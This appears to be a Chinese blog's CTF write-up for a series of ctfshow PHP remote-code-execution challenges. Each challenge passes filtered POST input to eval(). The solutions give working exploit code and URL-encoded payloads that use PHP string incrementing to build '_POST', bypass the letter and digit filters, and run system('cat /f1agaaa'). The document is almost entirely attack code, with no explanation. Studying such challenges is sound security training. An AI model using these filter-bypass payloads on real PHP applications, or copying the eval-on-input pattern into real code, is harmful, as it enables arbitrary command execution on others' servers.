RCE 1
challenge
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php error_reporting(0 ); highlight_file(__FILE__ ); $code = $_POST ['code' ];$code = str_replace("(" ,"括号" ,$code );$code = str_replace("." ,"点" ,$code );eval ($code );?>
exp
1 code=echo `$_POST [1 ]`;&1 =cat /f*
RCE 2
challenge
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php error_reporting(0 ); highlight_file(__FILE__ ); if (isset ($_POST ['ctf_show' ])) { $ctfshow = $_POST ['ctf_show' ]; if (is_string($ctfshow )) { if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$ctfshow )){ eval ($ctfshow ); }else { echo ("Are you hacking me AGAIN?" ); } }else { phpinfo(); } } ?>
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php $_ =[].'' ;$_ =$_ ['' =='$' ];$____ ='_' ;$__ =$_ ;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$____ .=$__ ;$__ =$_ ;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$____ .=$__ ;$__ =$_ ;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$____ .=$__ ;$__ =$_ ;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$__ ++;$____ .=$__ ;$_ =$____ ;$$_ [__]($$_ [_]);
payload
1 ctf_show =%24 %5 F%3 D%5 B%5 D%2 E%27 %27 %3 B%24 %5 F%3 D%24 %5 F%5 B%27 %27 %3 D%3 D%27 %24 %27 %5 D%3 B%24 %5 F%5 F%5 F%5 F%3 D%27 %5 F%27 %3 B%24 %5 F%5 F%3 D%24 %5 F%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%5 F%5 F%2 E%3 D%24 %5 F%5 F%3 B%24 %5 F%5 F%3 D%24 %5 F%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%5 F%5 F%2 E%3 D%24 %5 F%5 F%3 B%24 %5 F%5 F%3 D%24 %5 F%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%5 F%5 F%2 E%3 D%24 %5 F%5 F%3 B%24 %5 F%5 F%3 D%24 %5 F%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%2 B%2 B%3 B%24 %5 F%5 F%5 F%5 F%2 E%3 D%24 %5 F%5 F%3 B%24 %5 F%3 D%24 %5 F%5 F%5 F%5 F%3 B%24 %24 %5 F%5 B%5 F%5 F%5 D%28 %24 %24 %5 F%5 B%5 F%5 D%29 %3 B&__=system&_=cat /f1 agaaa
RCE 3
challenge
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php error_reporting(0 ); highlight_file(__FILE__ ); if (isset ($_POST ['ctf_show' ])) { $ctfshow = $_POST ['ctf_show' ]; if (is_string($ctfshow ) && strlen($ctfshow ) <= 105 ) { if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$ctfshow )){ eval ($ctfshow ); }else { echo ("Are you hacking me AGAIN?" ); } }else { phpinfo(); } } ?>
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php $a =(0 /0 );$a .=_;$a =$a [0 ];$a ++;$o =$a ++;$p =$a ++;$a ++;$a ++;$s =$a ++;$t =$a ;$_ =_;$_ .=$p .$o .$s .$t ;$$_ [0 ]($$_ [1 ]);
payload
1 ctf_show=$%ff=(0 /0 );$%ff.=_;$%ff=$%ff[0 ];$%ff%2b%2b;$%fd=$%ff%2b%2b;$%fe=$%ff%2b%2b;$%ff%2b%2b;$%ff%2b%2b;$%fc=$%ff%2b%2b;$%fb=$%ff;$_=_;$_.=$%fe.$%fd.$%fc.$%fb;$$_[0 ]($$_[1 ]);&0 =system &1 =cat /f1agaaa
RCE 4
challenge
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php error_reporting(0 ); highlight_file(__FILE__ ); if (isset ($_POST ['ctf_show' ])) { $ctfshow = $_POST ['ctf_show' ]; if (is_string($ctfshow ) && strlen($ctfshow ) <= 84 ) { if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$ctfshow )){ eval ($ctfshow ); }else { echo ("Are you hacking me AGAIN?" ); } }else { phpinfo(); } } ?>
exp
1 2 3 4 5 6 7 8 9 10 <?php $a =(_/_._)[0 ];$o =++$a ;$o =++$a .$o ;$a ++;$a ++;$o .=++$a ;$o .=++$a ;$_ =_.$o ;$$_ [0 ]($$_ [_]);
payload
1 ctf_show=$%ff=(_/_._)[0 ];$%fe=%2b%2b$%ff;$%fe=%2b%2b$%ff.$%fe;$%ff%2b%2b;$%ff%2b%2b;$%fe.=%2b%2b$%ff;$%fe.=%2b%2b$%ff;$_=_.$%fe;$$_[0 ]($$_[_]);&0 =system &_=cat /f1agaaa
RCE 5
challenge
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php error_reporting(0 ); highlight_file(__FILE__ ); if (isset ($_POST ['ctf_show' ])) { $ctfshow = $_POST ['ctf_show' ]; if (is_string($ctfshow ) && strlen($ctfshow ) <= 73 ) { if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$ctfshow )){ eval ($ctfshow ); }else { echo ("Are you hacking me AGAIN?" ); } }else { phpinfo(); } } ?>
exp
1 2 3 4 5 6 7 <?php $a =_(a/a)[a];$_ =++$a ;$_ =_.++$a .$_ ;$a ++;$a ++;$_ .=++$a .++$a ;$$_ [a]($$_ [_]);
payload
1 ctf_show=$%ff=_(%ff/%ff)[%ff];$_=%2b%2b$%ff;$_=_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.=%2b%2b$%ff.%2b%2b$%ff;$$_[_]($$_[%ff]);&_=system &%ff=cat /f1agaaa
68 字符
exp
1 2 3 $_ =_(a/a)[_];$a =++$_ ;$$a [$a =_.++$_ .$a [$_ ++/$_ ++].++$_ .++$_ ]($$a [_]);
payload
1 ctf_show=$_=_(%ff/%ff)[_];$%ff=%2b%2b$_;$$%ff[$%ff=_.%2b%2b$_.$%ff[$_%2b%2b/$_%2b%2b].%2b%2b$_.%2b%2b$_]($$%ff[_]);&_POST=system &_=cat /f1agaaa
72 字符
exp
1 2 3 4 5 6 7 <?php $a =_(a/a)[a];++$a ; $_ =$a .$a ++;$a ++;$a ++;$_ =_.$_ .++$a .++$a ;$$_ [a]($$_ [_]);
payload
1 ctf_show=$%ff=_(%ff/%ff)[%ff];%2b%2b$%ff;$_=$%ff.$%ff%2b%2b;$%ff%2b%2b;$%ff%2b%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system &_=cat /f1agaaa
如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !